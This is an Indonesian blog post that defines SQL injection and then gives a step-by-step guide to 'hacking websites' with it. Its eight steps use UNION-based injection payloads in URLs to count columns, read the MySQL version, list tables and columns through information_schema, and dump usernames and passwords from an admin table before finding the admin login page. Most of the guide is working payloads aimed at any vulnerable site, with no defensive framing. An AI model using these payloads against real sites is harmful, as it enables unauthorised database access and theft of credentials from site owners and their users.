21.11
si OTAK MATI
Pengertian Dari SQL Injection Atau Injeksi SQL - Injeksi SQL
atau SQL Injection (Dalam bahasa inggris) adalah sebuah teknik dimana
dengan menggunakan/menyalahgunakan sebuah celah keamanan yang terjadi
dalam lapisan basis data sebuah aplikasi/web server. Celah ini terjadi
ketika login/masukan pengguna.
Tidak disaring secara benar dari karakter-karakter pelolos bentukan
string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak
kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya
adalah suatu contoh dari sebuah kategori celah keamanan yang lebih umum
yang dapat terjadi setiap kali sebuah bahasa pemrograman atau
skrip(Script) diimbuhkan/dimasukan di dalam bahasa yang lain.
(Source Wikipedia)
karakter: ' atau -
SQL Injection adalah jenis aksi hacking pada keamanan
komputer di mana seorang penyerang/attacker bisa mendapatkan akses ke
basis data di dalam sistem(Sistem Utama). SQL injection yaitu serangan
yang mirip dengan serangan XSS dalam arti bahwa penyerang memanfaatkan
aplikasi vektor dan juga dengan Common dalam serangan XSS.
SQL Injection atau Injeksi SQL exploits dan sejenisnya
adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa
lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP
atau Perl mengakses database melalui SQL query. Jika data yang diterima
dari pengguna akhir yang dikirim langsung ke database dan tidak disaring
dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya
sebagai bagian dari input.
(de-kill.blogspot.com)
Lebih singkatnya
SQL Injection adalah salah satu teknik yang sering di
gunakan untuk menyerang sebuah situs web. dengan cara ini memungkinkan
seseorang dapat login tanpa harus memiliki akun di sebuah web site
Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus,
maupun menambahkan data–data yang berada didalam database bahkan pula
dapat mematikannya.
oke sekarang teman-teman dumay udah paham dan mengerti apa itu SQL Injection ada apa kegunaannya.sekarang kita beralih ke topik pembahasan sebelumnya yaitu mengenaik Bagaimana cara Hacking Website dengan Teknik SQL Injaction Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x
[ Step 1 ]
Carilah target
Misal: site:/berita.php?id=1
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
site:/berita.php?id=1' atau
site:/berita.php?id=-1
[ Step 2 ]
Mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah: order by
Contoh:
site:/berita.php?id=-1+order+by+1-- atau
site:/berita.php?id=-1+order+by+1/*
teliti secara step by step (satupersatu)...
Misal:
site:/berita.php?id=-1+order+by+1--
site:/berita.php?id=-1+order+by+2--
site:/berita.php?id=-1+order+by+3--
site:/berita.php?id=-1+order+by+4--
Sehingga muncul error atau hilang pesan error...
Misal: site:berita.php?id=-1+order+by+9--
Berarti yang kita ambil adalah sampai angka 8
Menjadi site:/berita.php?id=-1+order+by+8--
[ Step 3 ]
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: site:/berita.php?id=-1+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: site:/berita.php?id=-1+union+select+1,2,3,4,version(),6,7,8-- atau
site:/berita.php?id=-1+union+select+1,2,3,4,@@version,6,7,8--
Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
Untuk menampilkan table yang ada pada web tersebut adalah
perintah table_name >>> dimasukan pada angka yangg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
site:/berita.php?id=-1+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
untuk menampilkan semua isi dari table tersebut adalah
perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
site:/berita.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ?tables+where+table_schema=database()--
[ Step 6 ]
Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
site:/berita.php?id=-1+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0xhexa--
Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
Website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm
Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E
site:/berita.php?id=-1+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0x61646D696E--
[ Step 7 ]
Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
site:/berita.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
Contoh kata yang keluar adalah id,username,password
Contoh : site:/berita.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
[ Step 8 ]
Tahap terakhir mencari halaman admin atau login.
sampai pada tahap terakahir ini pembahasan tentang Sql Injaction,mungkin bila temen-temen kurang begitu jelas silahkan belajar sendiri atau silahkan mencari buku/browser tentang sql injection ini. kita sama-sama belajar bila ada kesalahan dalam tulisan dan cara pembahasaan maka saya minta maaf dan semoga pembahasan ini bermanfaat buat saya dan temen-temen di dumay smuanya!!!amiiii.....
By@Si OTAK MATI
Posted in: 
0 komentar:
Posting Komentar
Thankz For Your Koment